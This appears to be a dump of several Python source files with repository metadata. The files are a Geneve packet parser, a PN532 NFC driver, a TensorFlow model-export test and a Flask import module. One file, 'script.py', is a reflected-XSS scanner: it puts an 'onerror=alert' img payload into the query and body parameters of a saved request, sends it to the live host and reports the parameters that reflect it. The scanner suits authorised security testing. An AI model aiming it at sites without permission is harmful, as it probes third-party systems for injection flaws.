92c03b96267c810090cd7e2215635b87807b5c40
6,913
py
Python
fluxory/lib/packet/geneve.py
viniarck/fluxory
a00b930785039b81807290d585c6b2a31142e9d2
[ "Apache-2.0" ]
null
null
null
fluxory/lib/packet/geneve.py
viniarck/fluxory
a00b930785039b81807290d585c6b2a31142e9d2
[ "Apache-2.0" ]
13
2019-04-03T15:08:45.000Z
2019-05-17T23:10:16.000Z
fluxory/lib/packet/geneve.py
viniarck/fluxory
a00b930785039b81807290d585c6b2a31142e9d2
[ "Apache-2.0" ]
null
null
null
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """ Geneve packet parser/serializer """ import struct from fluxory.lib import stringify from fluxory.lib import type_desc from . import packet_base from . import ether_types UDP_DST_PORT = 6081 class geneve(packet_base.PacketBase): """Geneve (RFC draft-ietf-nvo3-geneve-03) header encoder/decoder class. An instance has the following attributes at least. Most of them are same to the on-wire counterparts but in host byte order. __init__ takes the corresponding args in this order. ============== ======================================================== Attribute Description ============== ======================================================== version Version. opt_len The length of the options fields. flags Flag field for OAM packet and Critical options present. protocol Protocol Type field. The Protocol Type is defined as "ETHER TYPES". vni Identifier for unique element of virtual network. options List of ``Option*`` instance. ============== ======================================================== """ _HEADER_FMT = "!BBHI" _MIN_LEN = struct.calcsize(_HEADER_FMT) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |Ver| Opt Len |O|C| Rsvd. | Protocol Type | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Virtual Network Identifier (VNI) | Reserved | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Length Options | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # Flags OAM_PACKET_FLAG = 1 << 7 CRITICAL_OPTIONS_FLAG = 1 << 6 @classmethod class Option(stringify.StringifyMixin, type_desc.TypeDisp): """ Tunnel Options """ _OPTION_PACK_STR = "!HBB" _OPTION_LEN = struct.calcsize(_OPTION_PACK_STR) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Option Class | Type |R|R|R| Length | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Option Data | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ @classmethod @classmethod @Option.register_unknown_type() class OptionDataUnknown(Option): """ Unknown Option Class and Type specific Option """ @classmethod
36.193717
77
0.542022
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """ Geneve packet parser/serializer """ import struct from fluxory.lib import stringify from fluxory.lib import type_desc from . import packet_base from . import ether_types UDP_DST_PORT = 6081 class geneve(packet_base.PacketBase): """Geneve (RFC draft-ietf-nvo3-geneve-03) header encoder/decoder class. An instance has the following attributes at least. Most of them are same to the on-wire counterparts but in host byte order. __init__ takes the corresponding args in this order. ============== ======================================================== Attribute Description ============== ======================================================== version Version. opt_len The length of the options fields. flags Flag field for OAM packet and Critical options present. protocol Protocol Type field. The Protocol Type is defined as "ETHER TYPES". vni Identifier for unique element of virtual network. options List of ``Option*`` instance. ============== ======================================================== """ _HEADER_FMT = "!BBHI" _MIN_LEN = struct.calcsize(_HEADER_FMT) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |Ver| Opt Len |O|C| Rsvd. | Protocol Type | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Virtual Network Identifier (VNI) | Reserved | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Length Options | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # Flags OAM_PACKET_FLAG = 1 << 7 CRITICAL_OPTIONS_FLAG = 1 << 6 def __init__(self, version=0, opt_len=0, flags=0, protocol=ether_types.ETH_TYPE_TEB, vni=None, options=None): super(geneve, self).__init__() self.version = version self.opt_len = opt_len assert (flags & 0x3F) == 0 self.flags = flags self.protocol = protocol self.vni = vni for o in options: assert isinstance(o, Option) self.options = options @classmethod def parser(cls, buf): (ver_opt_len, flags, protocol, vni) = struct.unpack_from(cls._HEADER_FMT, buf) version = ver_opt_len >> 6 # The Opt Len field expressed in four byte multiples. opt_len = (ver_opt_len & 0x3F) * 4 opt_bin = buf[cls._MIN_LEN:cls._MIN_LEN + opt_len] options = [] while opt_bin: option, opt_bin = Option.parser(opt_bin) options.append(option) msg = cls(version, opt_len, flags, protocol, vni >> 8, options) from . import ethernet geneve._TYPES = ethernet.ethernet._TYPES geneve.register_packet_type(ethernet.ethernet, ether_types.ETH_TYPE_TEB) return (msg, geneve.get_packet_type(protocol), buf[cls._MIN_LEN + opt_len:]) def serialize(self, payload=None, prev=None): tunnel_options = bytearray() for o in self.options: tunnel_options += o.serialize() self.opt_len = len(tunnel_options) # The Opt Len field expressed in four byte multiples. opt_len = self.opt_len // 4 return (struct.pack(self._HEADER_FMT, (self.version << 6) | opt_len, self.flags, self.protocol, self.vni << 8) + tunnel_options) class Option(stringify.StringifyMixin, type_desc.TypeDisp): """ Tunnel Options """ _OPTION_PACK_STR = "!HBB" _OPTION_LEN = struct.calcsize(_OPTION_PACK_STR) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Option Class | Type |R|R|R| Length | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Option Data | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ def __init__(self, option_class=None, type_=None, length=0): super(Option, self).__init__() if option_class is None or type_ is None: (option_class, type_) = self._rev_lookup_type(self.__class__) self.option_class = option_class self.type = type_ self.length = length @classmethod def parse_value(cls, buf): # Sub-classes should override this method, if needed. return {} def serialize_value(self): # Sub-classes should override this method, if needed. return b'' @classmethod def parser(cls, buf): (option_class, type_, length) = struct.unpack_from(cls._OPTION_PACK_STR, buf) # The Length field expressed in four byte multiples. length *= 4 subcls = Option._lookup_type((option_class, type_)) return ( subcls(option_class=option_class, type_=type_, length=length, **subcls.parse_value( buf[cls._OPTION_LEN:cls._OPTION_LEN + length])), buf[cls._OPTION_LEN + length:]) def serialize(self, _payload=None, _prev=None): data = self.serialize_value() self.length = len(data) # The Length field expressed in four byte multiples. length = self.length // 4 return (struct.pack(self._OPTION_PACK_STR, int(self.option_class), self.type, length) + data) @Option.register_unknown_type() class OptionDataUnknown(Option): """ Unknown Option Class and Type specific Option """ def __init__(self, buf, option_class=None, type_=None, length=0): super(OptionDataUnknown, self).__init__(option_class=option_class, type_=type_, length=length) self.buf = buf @classmethod def parse_value(cls, buf): return {"buf": buf} def serialize_value(self): return self.buf
3,316
0
292
463b9880708ab93eb7c556b07a756c4f2a013afe
4,116
py
Python
adafruit_pn532/i2c.py
dunkmann00/Adafruit_CircuitPython_PN532
b741c77cee4c1fce61bc478b6afa2e11528389f9
[ "MIT" ]
null
null
null
adafruit_pn532/i2c.py
dunkmann00/Adafruit_CircuitPython_PN532
b741c77cee4c1fce61bc478b6afa2e11528389f9
[ "MIT" ]
null
null
null
adafruit_pn532/i2c.py
dunkmann00/Adafruit_CircuitPython_PN532
b741c77cee4c1fce61bc478b6afa2e11528389f9
[ "MIT" ]
null
null
null
# Adafruit PN532 NFC/RFID control library. # Author: Tony DiCola # # The MIT License (MIT) # # Copyright (c) 2015-2018 Adafruit Industries # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """ ``adafruit_pn532.i2c`` ==================================================== This module will let you communicate with a PN532 RFID/NFC shield or breakout using I2C. * Author(s): Original Raspberry Pi code by Tony DiCola, CircuitPython by ladyada, refactor by Carter Nelson """ __version__ = "0.0.0-auto.0" __repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_PN532.git" import time import adafruit_bus_device.i2c_device as i2c_device from digitalio import Direction from micropython import const from adafruit_pn532.adafruit_pn532 import PN532, BusyError _I2C_ADDRESS = const(0x24) class PN532_I2C(PN532): """Driver for the PN532 connected over I2C.""" def __init__(self, i2c, *, irq=None, reset=None, req=None, debug=False): """Create an instance of the PN532 class using I2C. Note that PN532 uses clock stretching. Optional IRQ pin (not used), reset pin and debugging output. """ self.debug = debug self._req = req self._i2c = i2c_device.I2CDevice(i2c, _I2C_ADDRESS) super().__init__(debug=debug, irq=irq, reset=reset) def _wakeup(self): # pylint: disable=no-self-use """Send any special commands/data to wake up PN532""" if self._reset_pin: self._reset_pin.value = True time.sleep(0.01) if self._req: self._req.direction = Direction.OUTPUT self._req.value = False time.sleep(0.01) self._req.value = True time.sleep(0.01) self.low_power = False self.SAM_configuration() # Put the PN532 back in normal mode def _wait_ready(self, timeout=1): """Poll PN532 if status byte is ready, up to `timeout` seconds""" status = bytearray(1) timestamp = time.monotonic() while (time.monotonic() - timestamp) < timeout: try: with self._i2c: self._i2c.readinto(status) except OSError: continue if status == b"\x01": return True # No longer busy time.sleep(0.01) # lets ask again soon! # Timed out! return False def _read_data(self, count): """Read a specified count of bytes from the PN532.""" # Build a read request frame. frame = bytearray(count + 1) with self._i2c as i2c: i2c.readinto(frame, end=1) # read status byte! if frame[0] != 0x01: # not ready raise BusyError i2c.readinto(frame) # ok get the data, plus statusbyte if self.debug: print("Reading: ", [hex(i) for i in frame[1:]]) return frame[1:] # don't return the status byte def _write_data(self, framebytes): """Write a specified count of bytes to the PN532""" with self._i2c as i2c: i2c.write(framebytes)
37.761468
81
0.649417
# Adafruit PN532 NFC/RFID control library. # Author: Tony DiCola # # The MIT License (MIT) # # Copyright (c) 2015-2018 Adafruit Industries # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """ ``adafruit_pn532.i2c`` ==================================================== This module will let you communicate with a PN532 RFID/NFC shield or breakout using I2C. * Author(s): Original Raspberry Pi code by Tony DiCola, CircuitPython by ladyada, refactor by Carter Nelson """ __version__ = "0.0.0-auto.0" __repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_PN532.git" import time import adafruit_bus_device.i2c_device as i2c_device from digitalio import Direction from micropython import const from adafruit_pn532.adafruit_pn532 import PN532, BusyError _I2C_ADDRESS = const(0x24) class PN532_I2C(PN532): """Driver for the PN532 connected over I2C.""" def __init__(self, i2c, *, irq=None, reset=None, req=None, debug=False): """Create an instance of the PN532 class using I2C. Note that PN532 uses clock stretching. Optional IRQ pin (not used), reset pin and debugging output. """ self.debug = debug self._req = req self._i2c = i2c_device.I2CDevice(i2c, _I2C_ADDRESS) super().__init__(debug=debug, irq=irq, reset=reset) def _wakeup(self): # pylint: disable=no-self-use """Send any special commands/data to wake up PN532""" if self._reset_pin: self._reset_pin.value = True time.sleep(0.01) if self._req: self._req.direction = Direction.OUTPUT self._req.value = False time.sleep(0.01) self._req.value = True time.sleep(0.01) self.low_power = False self.SAM_configuration() # Put the PN532 back in normal mode def _wait_ready(self, timeout=1): """Poll PN532 if status byte is ready, up to `timeout` seconds""" status = bytearray(1) timestamp = time.monotonic() while (time.monotonic() - timestamp) < timeout: try: with self._i2c: self._i2c.readinto(status) except OSError: continue if status == b"\x01": return True # No longer busy time.sleep(0.01) # lets ask again soon! # Timed out! return False def _read_data(self, count): """Read a specified count of bytes from the PN532.""" # Build a read request frame. frame = bytearray(count + 1) with self._i2c as i2c: i2c.readinto(frame, end=1) # read status byte! if frame[0] != 0x01: # not ready raise BusyError i2c.readinto(frame) # ok get the data, plus statusbyte if self.debug: print("Reading: ", [hex(i) for i in frame[1:]]) return frame[1:] # don't return the status byte def _write_data(self, framebytes): """Write a specified count of bytes to the PN532""" with self._i2c as i2c: i2c.write(framebytes)
0
0
0
606edc3070bd5e542a9a768c731f9e95ef340f46
4,670
py
Python
script.py
AleksMVP/mitm-proxy
89c1ee40b78aecb0621c28515906ba635c98c7d8
[ "MIT" ]
2
2021-06-06T14:06:19.000Z
2021-11-30T19:12:38.000Z
script.py
AleksMVP/myproxy
89c1ee40b78aecb0621c28515906ba635c98c7d8
[ "MIT" ]
1
2021-12-11T18:30:39.000Z
2022-02-27T15:39:34.000Z
script.py
AleksMVP/myproxy
89c1ee40b78aecb0621c28515906ba635c98c7d8
[ "MIT" ]
2
2021-06-06T15:21:52.000Z
2021-08-12T10:15:10.000Z
from http.server import BaseHTTPRequestHandler import http import argparse from urllib.parse import urlparse from urllib.parse import urlencode from urllib.parse import parse_qs from urllib.parse import unquote import socket, ssl, pprint from io import BytesIO XSS = "'\"><img src=\"\" onerror=alert(\"\")>" FILE_PATH = "/Users/aleks/Desktop/tp-thirdsem/myproxy/requests/POSTauth.mail.rufe133c21211f65cb1240f2354a24b4eac6be149529c92188d25ee97e149666db" if __name__ == "__main__": parser = argparse.ArgumentParser(description="Search vulnarabilities") parser.add_argument("-f", "--filepath", metavar="", required=True, type=argparse.FileType('r'), help="path to file with request") parser.add_argument("-b", "--body", action="store_true", help="flag to check body params") parser.add_argument("-q", "--query", action="store_true", help="flag to check query params") args = parser.parse_args() request_str = "" # we don't really need this because it's python but ... request_lines = args.filepath.readlines() request_str = "".join(request_lines) searcher = VulnerabilitySearcher(request_str) if args.query: searcher.check_query_params() if args.body: searcher.check_body_params()
34.850746
144
0.631906
from http.server import BaseHTTPRequestHandler import http import argparse from urllib.parse import urlparse from urllib.parse import urlencode from urllib.parse import parse_qs from urllib.parse import unquote import socket, ssl, pprint from io import BytesIO XSS = "'\"><img src=\"\" onerror=alert(\"\")>" FILE_PATH = "/Users/aleks/Desktop/tp-thirdsem/myproxy/requests/POSTauth.mail.rufe133c21211f65cb1240f2354a24b4eac6be149529c92188d25ee97e149666db" def make_https_request(host, data): port = 443 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(10) ssl_sock = ssl.wrap_socket(s) ssl_sock.connect((host, port)) ssl_sock.sendall(data.encode()) data = ssl_sock.recv(100000024) return data.decode() def make_http_request(host, data): port = 80 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: ssl_sock = s ssl_sock.connect((host, port)) ssl_sock.sendall(data.encode()) data = ssl_sock.recv(1000024) return data.decode() def prepare_query(query_array): for key in query_array.keys(): query_array[key] = query_array[key][0] def generate_xss_dict(query_array): for key in query_array.keys(): old_value = query_array[key] query_array[key] = XSS yield dict(query_array) query_array[key] = old_value class HTTPRequest(BaseHTTPRequestHandler): def __init__(self, request_text): self.rfile = BytesIO(request_text) self.raw_requestline = self.rfile.readline() self.error_code = self.error_message = None self.parse_request() def send_error(self, code, message): self.error_code = code self.error_message = message class VulnerabilitySearcher: def __init__(self, request): self.request = request def check_query_params(self): request = HTTPRequest(self.request.encode()) host = request.headers["Host"] parsed_url = urlparse(request.path) parsed_query = parse_qs(parsed_url.query) if parsed_query: prepare_query(parsed_query) for i in generate_xss_dict(parsed_query): print(f"New query params: {i}") query_string = urlencode(i) new_request = self.request.replace(parsed_url.query, unquote(query_string)) response = make_https_request(host, new_request) if response.find(XSS) != -1: print(f"Found: {i}") def check_body_params(self): request = HTTPRequest(self.request.encode()) host = request.headers["Host"] if "Content-Type" in request.headers.keys() and \ request.headers["Content-Type"] == "application/x-www-form-urlencoded": pattern = "\n\n" pos = request_str.find(pattern) request_body = request_str[pos+len(pattern):] parsed_body_parameters = parse_qs(request_body) prepare_query(parsed_body_parameters) if parsed_body_parameters: for i in generate_xss_dict(parsed_body_parameters): print(f"New body params: {i}") query_string = urlencode(i) old_content_length = f"Content-Length: {request.headers['Content-Length']}" new_content_length = f"Content-Length: {len(unquote(query_string))}" new_request = self.request.replace( request_body, unquote(query_string) ).replace( old_content_length, new_content_length ) response = make_https_request(host, new_request) if response.find(XSS) != -1: print(f"Found: {i}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Search vulnarabilities") parser.add_argument("-f", "--filepath", metavar="", required=True, type=argparse.FileType('r'), help="path to file with request") parser.add_argument("-b", "--body", action="store_true", help="flag to check body params") parser.add_argument("-q", "--query", action="store_true", help="flag to check query params") args = parser.parse_args() request_str = "" # we don't really need this because it's python but ... request_lines = args.filepath.readlines() request_str = "".join(request_lines) searcher = VulnerabilitySearcher(request_str) if args.query: searcher.check_query_params() if args.body: searcher.check_body_params()
3,119
28
271
b1892cce88651cc532dbfc88347950e86e324f77
8,579
py
Python
cvm/tests/test_tensorflow.py
CortexFoundation/tvm-cvm
d8941dc60a51dd27a6d2accc1eff2eced3b3640d
[ "Apache-2.0" ]
6
2019-07-04T09:42:53.000Z
2021-12-28T13:19:48.000Z
cvm/tests/test_tensorflow.py
CortexFoundation/tvm-cvm
d8941dc60a51dd27a6d2accc1eff2eced3b3640d
[ "Apache-2.0" ]
4
2019-06-27T08:05:18.000Z
2021-09-09T18:59:11.000Z
cvm/tests/test_tensorflow.py
CortexFoundation/tvm-cvm
d8941dc60a51dd27a6d2accc1eff2eced3b3640d
[ "Apache-2.0" ]
null
null
null
import tensorflow as tf import utils from tensorflow.keras import backend as K from tensorflow.keras.models import load_model # from keras import backend as K # from keras.models import load_model # from tensorflow.python.keras import backend as K def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True): """ Freezes the state of a session into a pruned computation graph. Creates a new computation graph where variable nodes are replaced by constants taking their current value in the session. The new graph will be pruned so subgraphs that are not necessary to compute the requested outputs are removed. @param session The TensorFlow session to be frozen. @param keep_var_names A list of variable names that should not be frozen, or None to freeze all the variables in the graph. @param output_names Names of the relevant graph outputs. @param clear_devices Remove the device directives from the graph for better portability. @return The frozen graph definition. """ from tensorflow.python.framework.graph_util import convert_variables_to_constants graph = session.graph with graph.as_default(): freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or [])) output_names = output_names or [] output_names += [v.op.name for v in tf.global_variables()] # Graph -> GraphDef ProtoBuf input_graph_def = graph.as_graph_def() if clear_devices: for node in input_graph_def.node: node.device = "" frozen_graph = convert_variables_to_constants(session, input_graph_def, output_names, freeze_var_names) return frozen_graph import os from tvm.relay.frontend import tensorflow_parser as tp from official.vision.image_classification import resnet_model as resm from tensorflow.python.framework.graph_util import convert_variables_to_constants import keras_applications as kapp import keras from tensorflow_parser import TFParser from tensorflow.python.framework import dtypes import mxnet as mx if __name__ == '__main__': utils.log_init() # net = keras.applications.resnet.ResNet50(weights='imagenet') # net = tf.keras.applications.ResNet50(weights='imagenet') # net = tf.keras.applications.InceptionV3(weights='imagenet') # net = keras.applications.InceptionV3(weights='imagenet') net = tf.keras.applications.MobileNet(weights='imagenet') # dump_model(net, "/data/tfmodels/resnet50_v1_new") # load_imagenet() test_tf_parser()
38.819005
111
0.659751
import tensorflow as tf import utils from tensorflow.keras import backend as K from tensorflow.keras.models import load_model # from keras import backend as K # from keras.models import load_model # from tensorflow.python.keras import backend as K def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True): """ Freezes the state of a session into a pruned computation graph. Creates a new computation graph where variable nodes are replaced by constants taking their current value in the session. The new graph will be pruned so subgraphs that are not necessary to compute the requested outputs are removed. @param session The TensorFlow session to be frozen. @param keep_var_names A list of variable names that should not be frozen, or None to freeze all the variables in the graph. @param output_names Names of the relevant graph outputs. @param clear_devices Remove the device directives from the graph for better portability. @return The frozen graph definition. """ from tensorflow.python.framework.graph_util import convert_variables_to_constants graph = session.graph with graph.as_default(): freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or [])) output_names = output_names or [] output_names += [v.op.name for v in tf.global_variables()] # Graph -> GraphDef ProtoBuf input_graph_def = graph.as_graph_def() if clear_devices: for node in input_graph_def.node: node.device = "" frozen_graph = convert_variables_to_constants(session, input_graph_def, output_names, freeze_var_names) return frozen_graph import os from tvm.relay.frontend import tensorflow_parser as tp from official.vision.image_classification import resnet_model as resm from tensorflow.python.framework.graph_util import convert_variables_to_constants def dump_resnet50_v1(): root = "/tmp/tfmodels" model = resm.resnet50(1000) # model.compile(optimizer=tf.keras.optimizers.Adam(), # loss=tf.keras.losses.sparse_categorical_crossentropy, # metrics=['accuracy']) os.makedirs(root, exist_ok=True) model.save(os.path.join(root, "keras.h5")) # tf.contrib.saved_model.save_keras_model(model, root, # serving_only=False) K.set_learning_phase(0) model = load_model(os.path.join(root, "keras.h5")) print("DDDDDDD", model.outputs) frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs]) # with K.get_session() as sess: # frozen_graph = convert_variables_to_constants(sess, sess.graph_def, # [x.op.name for x in model.outputs]) tf.train.write_graph(frozen_graph, root, "resnet50_v1.pb", as_text=False) def dump_pretrain_resnet50_v1(): root = "/tmp/tf/resnet50_v1" os.makedirs(root, exist_ok=True) # resnet50_v1 = tf.keras.applications.ResNet50(weights=None) resnet50_v1 = tf.keras.applications.ResNet50(weights='imagenet') resnet50_v1.save(os.path.join(root, "model.h5")) K.set_learning_phase(0) model = load_model(os.path.join(root, "model.h5")) print ("ResNet50_V1 Model: ", model.outputs) frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs]) tf.train.write_graph(frozen_graph, root, "model.pb", as_text=False) import keras_applications as kapp def preprocess_image(image): image = tf.image.decode_jpeg(image, channels=3) image = tf.image.resize_images(image, [224, 224]) # image /= 255.0 # normalize to [0,1] range # image = kapp.resnet.preprocess_input(image) image = tf.keras.applications.resnet50.preprocess_input(image) print (image.numpy().min(), image.numpy().max()) return image def load_and_preprocess_image(path): image = tf.read_file(path) return preprocess_image(image) def load_and_preprocess_from_path_label(path, label): return load_and_preprocess_image(path), label def load_imagenet(): data_root = os.path.expanduser("~/.mxnet/datasets/imagenet/val") print (data_root) import random import pathlib data_root = pathlib.Path(data_root) all_image_paths = list(data_root.glob('*/*')) all_image_paths = [str(path) for path in all_image_paths] image_count = len(all_image_paths) print (image_count) print (all_image_paths[:10]) label_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir()) print (label_names[-10:]) label_to_index = dict((name, index) for index,name in enumerate(label_names)) all_image_labels = [label_to_index[pathlib.Path(path).parent.name] for path in all_image_paths] print (all_image_labels[:10]) ds = tf.data.Dataset.from_tensor_slices((all_image_paths, all_image_labels)) image_label_ds = ds.map(load_and_preprocess_from_path_label) print (image_label_ds) ds = image_label_ds.apply( tf.data.experimental.shuffle_and_repeat(buffer_size=image_count)) ds = ds.batch(16) # ds = ds.prefetch(buffer_size=AUTOTUNE) print (ds) import keras def dump_model(net, root="/tmp/tfmodels/"): os.makedirs(root, exist_ok=True) # resnet50_v1 = tf.keras.applications.ResNet50(weights=None) net.trainable = False net.save(os.path.join(root, "model.h5")) K.set_learning_phase(0) model = load_model(os.path.join(root, "model.h5")) print ("Model Output: ", model.outputs) frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs]) tf.train.write_graph(frozen_graph, root, "model.pb", as_text=False) from tensorflow_parser import TFParser from tensorflow.python.framework import dtypes import mxnet as mx def test_tf_parser(): def _tf_shape_to_list(shp): return [1 if d.size < 0 else d.size for d in shp.dim] def _get_attr(buf): fields = ["s", "i", "f", "b", "type", "shape", "tensor", "func"] x = buf ret = [] # Treat an empty oneof value as an empty list. if not x.WhichOneof("value"): return ret if x.HasField("list"): for f in fields: if getattr(x.list, f): if f == "type": ret += [dtypes.as_dtype(x) for x in list(getattr(x.list, f))] else: ret += list(getattr(x.list, f)) else: for f in fields: if x.HasField(f): if f == "type": ret = dtypes.as_dtype(getattr(x, f)) else: ret = getattr(x, f) return ret def _parse_attr(attr_proto): """Convert a list of AttributeProto to a dict, with names as keys.""" attrs = {} for key, value in attr_proto.items(): attrs[key] = _get_attr(value) print (key, value, "---", attrs[key]) return attrs model_path = "/data/tfmodels/resnet50_v1_new/model.pb" parser = TFParser(model_path) graph = parser.parse() nodes = {} node_map = {} input_shapes = {} tf_ops = set() for i, node in enumerate(graph.node): node_map[node.name] = node.op if node.op == 'Const': val = node.attr['value'].tensor input_shapes[node.name] = _tf_shape_to_list(val.tensor_shape) # print (node.name, node.op, input_shapes[node.name]) elif node.op == 'Placeholder' or node.op == 'PlaceholderWithDefault': input_shapes[node.name] = _tf_shape_to_list(node.attr['shape'].shape) print (node.name, node.op, input_shapes[node.name]) nodes[node.name] = [mx.sym.var(node.name, shape=input_shapes[node.name])] else: # print (node.op) tf_ops.add(node.op) print (tf_ops) for node in graph.node: if __name__ == '__main__': utils.log_init() # net = keras.applications.resnet.ResNet50(weights='imagenet') # net = tf.keras.applications.ResNet50(weights='imagenet') # net = tf.keras.applications.InceptionV3(weights='imagenet') # net = keras.applications.InceptionV3(weights='imagenet') net = tf.keras.applications.MobileNet(weights='imagenet') # dump_model(net, "/data/tfmodels/resnet50_v1_new") # load_imagenet() test_tf_parser()
5,730
0
180
de000d216bcbdb7cd4f3bca92009dd2bf900cfcc
4,372
py
Python
guitarfan/controlers/admin/data.py
timgates42/GuitarFan
1a6d6bcc7708cbb214648e7f5657728f6c27c48a
[ "MIT" ]
48
2015-02-02T02:25:07.000Z
2022-03-11T12:39:39.000Z
guitarfan/controlers/admin/data.py
timgates42/GuitarFan
1a6d6bcc7708cbb214648e7f5657728f6c27c48a
[ "MIT" ]
2
2015-09-13T14:00:41.000Z
2021-08-04T16:28:25.000Z
guitarfan/controlers/admin/data.py
timgates42/GuitarFan
1a6d6bcc7708cbb214648e7f5657728f6c27c48a
[ "MIT" ]
16
2015-01-09T08:15:13.000Z
2020-06-20T11:07:49.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import sys import shutil from uuid import uuid4 from flask import render_template, request, current_app, redirect, url_for, flash, Blueprint, jsonify from flask.ext.login import login_required from sqlalchemy import exists from guitarfan.extensions.flasksqlalchemy import db from guitarfan.utilities import oshelper from guitarfan.utilities import validator from guitarfan.models import * from forms.tab import * bp_admin_data = Blueprint('bp_admin_data', __name__, template_folder="../../templates/admin/tabs") @bp_admin_data.route('/admin/data/import', methods=['GET', 'POST']) @login_required
40.481481
127
0.527219
